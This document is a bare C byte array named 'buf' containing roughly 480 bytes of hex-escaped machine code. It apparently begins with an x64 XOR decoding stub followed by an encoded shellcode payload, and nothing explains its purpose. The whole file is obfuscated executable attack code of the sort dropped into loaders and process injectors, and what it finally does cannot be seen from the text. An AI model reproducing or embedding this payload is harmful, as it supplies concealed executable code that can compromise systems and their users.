unsigned char buf[] =
        "\x48\x31\xc9\x48\x81\xe9\xb2\xff\xff\xff\x48\x8d\x05\xef\xff"
        "\xff\xff\x48\xbb\x1b\x49\x6e\x34\x1f\x96\x9e\x86\x48\x31\x58"
        "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x53\x78\xa7\x7c\x9e\x7f"
        "\x29\x79\xe4\xb6\x26\xb9\x1a\x79\x61\x79\xe4\x01\xd5\x0f\x04"
        "\x4e\x39\xc2\x0d\xf2\x61\x7c\x2e\xce\xb9\xce\x36\xb1\x91\xcb"
        "\xe0\x74\x6a\xf5\x31\x58\x81\xf1\xe0\x91\x6e\x42\xff\xd9\x44"
        "\x75\xe6\xd2\x6e\x42\x48\x2a\x5a\x80\x27\x8b\x12\x55\x76\x03"
        "\x81\x41\x51\x0a\xd9\x90\xf8\x6e\x36\x8f\xeb\xd9\x4a\x7c\xe7"
        "\x7f\xcb\x71\xbe\x40\xfd\xb2\x66\xba\x4f\x77\x80\x40\xfd\x05"
        "\x95\xd4\x19\xb9\x0b\xff\x76\xdd\x7a\x7f\x7b\xc0\x58\xf7\x2f"
        "\xb5\xd1\xc8\xb5\x7a\x8b\x14\x60\xa5\x12\xf6\xd7\xce\xd4\xa3"
        "\xae\x24\xd7\x72\xd1\xf7\xd4\xa3\x19\xd7\xe1\xf2\xa2\xf5\x76"
        "\x44\xe8\x43\x12\x46\x66\x2f\x63\x71\xa9\x93\xa5\x88\xdc\xfc"
        "\x6c\x91\x4e\x75\xf7\x87\x47\x27\x90\xd9\x8c\xc0\x46\x3f\xd5"
        "\x76\xc6\x91\xfc\x43\x62\x27\x0c\x75\xf0\x91\x46\xc3\x1f\x27"
        "\x0c\x75\xb0\x91\x46\xe3\x57\x27\x88\x90\xda\x93\x80\xa0\xce"
        "\x27\xb6\xe7\x3c\xe5\xac\xed\x05\x43\xa7\x66\x51\x10\xc0\xd0"
        "\x06\xae\x65\xca\xc2\x98\x9c\xd9\x8c\x3d\xa7\xac\xd2\xe5\x85"
        "\x90\xd7\xe4\x07\xaf\x90\xd9\xcd\xd9\x82\xaf\xf3\x40\xd8\xd8"
        "\x1d\xc1\x8c\x27\x9f\x63\x1b\x99\xed\xd8\x06\xbf\x64\x71\xd8"
        "\x26\x04\xd0\x8c\x5b\x0f\x6f\x91\x0f\x80\xa0\xce\x27\xb6\xe7"
        "\x3c\x98\x0c\x58\x0a\x2e\x86\xe6\xa8\x39\xb8\x60\x4b\x6c\xcb"
        "\x03\x98\x9c\xf4\x40\x72\xb7\xdf\x63\x1b\x99\xe9\xd8\x06\xbf"
        "\xe1\x66\x1b\xd5\x85\xd5\x8c\x2f\x9b\x6e\x91\x09\x8c\x1a\x03"
        "\xe7\xcf\x26\x40\x98\x95\xd0\x5f\x31\xde\x7d\xd1\x81\x8c\xc8"
        "\x46\x35\xcf\xa4\x7c\xf9\x8c\xc3\xf8\x8f\xdf\x66\xc9\x83\x85"
        "\x1a\x15\x86\xd0\xd8\x6f\x26\x90\xd8\xb9\x18\xf4\x15\xcf\xea"
        "\xff\x91\x07\x2e\xd1\x6e\x19\x3f\x85\x10\xeb\xcf\x86\x27\x90"
        "\x90\x44\x74\x4e\xd3\x85\x27\x91\x62\x0d\x39\x3f\x6e\xc6\x73"
        "\xd9\x50\x29\xdd\x8e\x9e\xc6\x9d\xdc\xae\xeb\x96\xf8\xba\xcb"
        "\xae\x7a\xb1\xcc\x90\x07\x6f\xde\x66\x2a\xf0\x4d\xfa\x07\x90"
        "\x52\x77\xc0\x94\xfc\x58\x4a\x5e\x47\x6f\x6f\x19\x85\x18\xc5"
        "\x27\x78\xe7\xd8\x50\x0c\xd0\xbd\x85\x88\xf8\x70\x26\x18\xd9"
        "\x8e\xa8\xed\x37\xd1\x81\x81\x18\xe5\x27\x0e\xde\xd1\x63\x54"
        "\x34\x73\x0e\x78\xf2\xd8\x58\x09\xd1\x05\x6f\x87\x6e\x28\xba"
        "\xa0\xf5\x07\x6f\x87\x27\x90\x98\x9d\xd0\x57\x27\x0e\xc5\xc7"
        "\x8e\x9a\xdc\x36\xaf\xed\x2a\xc9\x98\x9d\x73\xfb\x09\x40\x63"
        "\xb4\x8d\xcc\x90\x4f\xe2\xc3\x03\x88\x1f\xcd\xf9\x4f\xe6\x61"
        "\x71\xc0\x98\x9d\xd0\x57\x2e\xd7\x6e\x6f\x19\x8c\xc1\x4e\x90"
        "\x4f\x6a\x19\x18\x81\x18\xc6\x2e\x3d\x5e\x5c\xe6\x4b\x6e\xd2"
        "\x27\xb6\xf5\xd8\x26\x07\x1a\x09\x2e\x3d\x2f\x17\xc4\xad\x6e"
        "\xd2\xd4\x77\x92\x32\x8f\x8c\x2b\xa1\xfa\x3a\xba\x6f\x0c\x85"
        "\x12\xc3\x47\xbb\x21\xec\xd3\x4d\x6a\xe7\x1a\x82\x9c\xd7\xca"
        "\xbf\xfe\x6d\x6f\xde\x66\x19\x03\x32\x44\x07\x6f\x87\x27\x2b"
        "\xbf\x91\x86";
